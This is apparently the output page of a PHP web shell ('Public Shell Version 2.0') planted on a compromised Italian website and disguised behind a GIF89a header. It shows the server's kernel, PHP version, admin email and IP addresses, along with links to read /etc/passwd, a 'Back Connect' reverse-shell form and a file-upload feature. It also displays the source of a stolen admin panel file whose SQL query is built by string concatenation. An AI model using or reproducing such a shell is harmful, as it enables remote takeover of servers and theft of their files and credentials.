GIF89a

Public Shell


Uname : Linux hlpi1ws-c319s07.ad.aruba.it 5.15.0-130-generic #140-Ubuntu SMP Wed Dec 18 17:59:53 UTC 2024 x86_64
PHP Version : 5.3.29
Server Admin : postmaster@www.giancio.com
Server IP : 192.168.3.109 Your IP : 18.188.15.246
Safe Mode : Safe Mode is OFF
Read etc/passwd : Disabled Functions : PHP INFO
Back Connect
IP : PORt :
'; Public Shell Version 2.0
Disable Functions: system,popen,dl,passthru,proc_open,shell_exec
Current Path : /web/htdocs/www.giancio.com/home/admin/function/
File Upload :
Current File : /web/htdocs/www.giancio.com/home/admin/function/pannello.php

<?php
////////////////////////PANNELLO DI CONTROLLO
function pannello() {
	$Nomesito = $_SERVER['HTTP_HOST'];
	$sitename = str_replace("www.", "", $Nomesito);
	$sitename2 = str_replace(".com", "", $sitename);
	$www = str_replace("nomesito .", "", $sitename);
	$query = "select * from utenti where ute_id =" . $_SESSION['ute_id'] . "";
	$result = mysql_query($query);
	$row = mysql_fetch_array($result);
	$out = '<h1>' . INSTRUCTIONS . '</h1>';
	$out .= '<p>' . WELCOME . ' <b>' . $row['ute_usn'] . '</b>,<br />' . TXT_HOME . ' <b>' . $sitename . '</b><br />' . TXT_HOME2 . '';
	$out .= '</div>';

	return ($out);
}

?>

Public Shell Version 2.0